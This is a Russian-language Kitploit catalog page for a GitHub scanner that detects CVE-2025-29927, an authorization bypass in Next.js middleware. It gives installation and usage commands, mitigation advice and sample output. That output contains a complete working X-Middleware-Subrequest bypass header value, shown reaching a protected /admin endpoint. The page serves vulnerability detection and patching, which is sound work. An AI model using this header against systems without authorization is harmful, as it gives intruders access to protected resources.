Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-29927 — Сканер обхода middleware Next.js | Kitploit
Инструменты/GitHubGitHub/gotr00t0day/cve-2025-29927
РазведкаСканеры уязвимостейЭксплуатация веб-приложенийСбор информацииВеб-безопасностьТестирование на Проникновение
GitHubgotr00t0day/cve-2025-29927

CVE-2025-29927

Сканер обхода middleware Next.js

Репозиторий
8111 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-29927

Сканер обхода Middleware в Next.js (CVE-2025-29927)

CVE-2025-29927 — это специализированный инструмент безопасности для обнаружения уязвимости обхода middleware в Next.js (CVE-2025-29927), затрагивающей версии Next.js с 11.1.4 по 15.2.2. Эта критическая уязвимость позволяет злоумышленникам обходить средства защиты, отправляя специально сформированный HTTP-заголовок.

Об уязвимости

Уязвимость обхода middleware в Next.js (CVE-2025-29927) позволяет злоумышленникам обходить механизмы авторизации, отправляя вредоносный заголовок X-Middleware-Subrequest, который сбивает с толку логику обработки middleware. Это может привести к несанкционированному доступу к защищённым ресурсам и маршрутам.

Оценка CVSS: 9.1 (Critical)

Возможности

  • Быстрое конкурентное сканирование нескольких целей
  • Опция пропуска проверки SSL-сертификата для сканирования по IP-адресам
  • Тихий режим для автоматизации и сфокусированного вывода
  • Детальная информация об уязвимости (коды состояния, заголовки обхода)
  • Обнаружение конечных точек для всестороннего тестирования

Установка

root@kitploit:~
# Клонируйте репозиторий
git clone https://github.com/gotr00t0day/CVE-2025-29927.git
cd CVE-2025-29927

# Установите зависимости
pip install -r requirements.txt

Использование

root@kitploit:~
python CVE-2025-29927.py [-h] [-t TARGET] [-f FILE] [-c CONCURRENCY] [-k] [-s]

Аргументы командной строки

  • -t, --target: Одиночная цель для сканирования (например, example.com или https://example.com)
  • -f, --file: Файл со списком целей (по одной на строку)
  • -c, --concurrency: Количество одновременных сканирований (по умолчанию: 5)
  • -k, --insecure: Отключить проверку SSL-сертификата (полезно для IP-адресов)
  • -s, --silent: Тихий режим — показывать только уязвимые цели

Примеры

Сканирование одной цели:

root@kitploit:~
python CVE-2025-29927.py -t example.com

Сканирование нескольких целей из файла:

root@kitploit:~
python CVE-2025-29927.py -f targets.txt

Сканирование с отключённой проверкой SSL:

root@kitploit:~
python CVE-2025-29927.py -t 192.168.1.1 -k

Автоматическое сканирование в тихом режиме:

root@kitploit:~
python CVE-2025-29927.py -f targets.txt -k -s

Сканирование с пользовательским заголовком:

root@kitploit:~
python3 CVE-2025-29927.py -t target -k -s -H "middleware"

Вывод

Для уязвимых целей MiddleWay отображает:

  • Уязвимую конечную точку
  • Исходный код состояния
  • Код состояния после обхода
  • Заголовок обхода, использованный для успешной эксплуатации

Пример вывода:

root@kitploit:~
[VULNERABLE] https://example.com - Endpoint /admin can be bypassed
  Original status: 401
  Bypassed status: 200
  Bypass header: X-Middleware-Subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware

Смягчение уязвимости

Чтобы устранить эту уязвимость:

  1. Обновитесь до Next.js 14.2.25, 15.2.3 или новее
  2. Если обновление невозможно, заблокируйте заголовок X-Middleware-Subrequest на уровне WAF или сервера

Отказ от ответственности

Этот инструмент предоставляется только для исследований в области безопасности и защитных целей. Всегда получайте надлежащее разрешение перед сканированием любых систем, которые вам не принадлежат. Авторы не несут ответственности за любое неправомерное использование этого инструмента.

Лицензия

MIT

Скачать инструмент